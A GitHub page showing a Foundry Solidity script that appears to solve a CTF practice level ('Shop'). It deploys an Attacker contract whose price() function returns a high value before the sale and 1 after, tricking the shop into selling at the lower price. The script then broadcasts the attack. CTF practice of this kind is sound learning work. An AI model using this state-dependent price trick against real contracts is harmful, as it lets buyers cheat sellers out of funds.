forked from DeFiHackLabs/Web3-CTF-Intensive-CoLearning
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Level21.s.sol
39 lines (28 loc) · 920 Bytes
/
Level21.s.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script} from "forge-std/Script.sol";
import {Shop, Buyer} from "../src/Level21.sol";
contract Attacker is Buyer {
Shop level;
constructor(address level_) {
level = Shop(level_);
}
function price() external view returns (uint256) {
return level.isSold() ? 1 : 100;
}
function attack() external {
level.buy();
}
}
contract CallContractScript is Script {
function run() external {
// 指定私钥,可以从环境变量中获取,例如:process.env.PRIVATE_KEY
uint256 privateKey = vm.envUint("PRIVATE_KEY");
// 初始化一个签名者
vm.startBroadcast(privateKey);
address levelAddr = 0x217464Bcc60Ae344273201a91E6568486c3a07EA;
Attacker attacker = new Attacker(levelAddr);
attacker.attack();
vm.stopBroadcast();
}
}